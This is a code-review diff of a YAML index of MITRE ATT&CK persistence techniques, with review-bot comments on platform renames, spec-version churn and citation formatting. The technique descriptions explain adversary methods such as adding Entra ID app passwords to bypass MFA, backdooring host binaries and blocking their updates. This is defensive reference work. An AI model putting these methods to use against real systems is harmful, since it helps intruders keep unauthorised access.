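Review bot: the removed `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list for T1137.001 are not actually dropped; the same keys reappear further down in the entry in a different order (`external_references` with `url` and `external_id` swapped, and the platform list now reading `Office Suite`). This is key-order churn from the generator rather than a content change, and it buries the real edits (platform rename, version bump). Emitting keys in a stable order would keep future diffs to the lines that actually changed.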
@@ -31192,6 +31554,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -31201,9 +31564,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -31211,11 +31578,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests: []
T1546.009:
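Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) is removed from T1137.001 with no replacement, while the re-added block gains `revoked: false` and `x_mitre_attack_spec_version: 3.2.0`. Dropping that field matches newer ATT&CK spec versions, where it is no longer populated, but any filter or index in this repository keyed on permissions will now silently match nothing for this technique; worth a line in the commit message and a check of the index generators. Separately, the `external_references` entries change key order (`url` before `external_id`, `description` before `url`), which is cosmetic and could be normalised in the generator.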
@@ -31247,7 +31650,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31295,13 +31698,11 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31314,16 +31715,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -31335,16 +31736,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
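Review bot: the platform list for T1098.005 replaces `Azure AD` and `SaaS` with a single `Identity Provider` value (version 1.2 to 1.3) while the description, as rewritten above, still names Entra ID and Intune specifically. That is consistent with the upstream platform consolidation, but per-platform index files grouped by `x_mitre_platforms` will drop this entry from the old Azure AD and SaaS lists and need a matching identity-provider index; confirm those index files are regenerated in the same change.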
@@ -31399,7 +31800,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -31460,7 +31860,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -31536,7 +31935,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -31564,8 +31963,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1205.001:
@@ -31591,7 +31988,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -31616,23 +32013,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
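Review bot: the rewritten sentence uses `Azure / Entra ID` here, whereas the other rewrites in this entry (for example `in Entra ID environments` a few lines further down) and in T1098.005 use plain `Entra ID`. Minor naming inconsistency inside one description; if the text is mirrored verbatim from upstream ATT&CK it should stay as is, otherwise pick one form.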
@@ -31642,11 +32037,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -31657,12 +32056,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -31671,6 +32077,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
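Review bot: the `x_mitre_detection` text here is unchanged and still covers only Azure Activity Logs for service principal changes and APIs that create or import SSH keys, even though this change extends the description with two new credential paths, the AWS `CreateLoginProfile` API and Entra ID app passwords. If this file mirrors upstream ATT&CK, the gap belongs upstream rather than in a hand edit here, but detection content for those two additions (console login profile creation and app password registration events) is the natural follow-up.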
@@ -31679,13 +32086,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -31711,10 +32121,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
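Review bot: the new `Lacework AI Resource Hijacking 2024` reference puts the title before the date and author (`Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs.`), while every neighbouring entry, including the new Permiso one, follows `Author. (date). Title.`. Suggest `Lacework Labs. (2024, June 6). Detecting AI resource-hijacking with Composite Alerts. Retrieved July 1, 2024.` so citation tooling that parses the author field behaves consistently.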
@@ -31723,10 +32141,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -31743,14 +32171,11 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -31825,7 +32250,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -31914,24 +32338,27 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
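Review bot: the replaced description line for T1554 carries the existing typo `persistence though modifications` (should be `through`) forward into the new text; since the line is being rewritten anyway to add the UNC3886 sentence, this is the moment to fix it, or to flag it upstream if the text is mirrored. The added paragraph on `yum-versionlock` and `versionlock.list` is clear and carries its citation.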
@@ -31945,7 +32372,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -31960,6 +32387,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
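Review bot: the new `Google Cloud Mandiant UNC3886 2024` reference has a stray leading space inside the quoted `description` value (`" Punsaen Boonyakarn, ...`), which will surface as a leading space in rendered citations; trim it. The rest of the entry (authors, date, retrieval date and URL) matches the citation style of the surrounding references.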
@@ -31973,11 +32405,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -32003,7 +32434,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -32017,7 +32447,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -32044,8 +32473,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -32056,7 +32485,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1546.014:
@@ -32097,7 +32527,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32117,12 +32547,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
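Review bot: T1546.014 keeps `x_mitre_attack_spec_version: 2.1.0` after `spec_version` is removed, while every other technique touched in this patch either already carries or is bumped to a 3.x attack spec version. Check whether the upstream object for T1546.014 really still reports 2.1.0 or whether the regeneration skipped it; mixed spec versions in one file make validation against a single schema awkward.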
@@ -32176,11 +32605,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32267,9 +32695,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -32282,12 +32710,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32300,9 +32727,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -32311,13 +32740,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
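Review bot: the `x_mitre_platforms` rewrite here (`Azure AD`, `Office 365`, `Google Workspace` out; `Office Suite`, `Identity Provider` in) changes the strings that per-platform consumers match on, so any index that is generated or filtered by the old platform names will silently stop picking up T1136.003 unless the platform-to-index mapping is updated in the same change. The `'1.5'` to `'1.6'` bump of `x_mitre_version` is consistent with an upstream content change; the `+ x_mitre_modified_by_ref` line, by contrast, only moves a key that a later hunk deletes from the bottom of the same object.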
@@ -32365,14 +32794,11 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
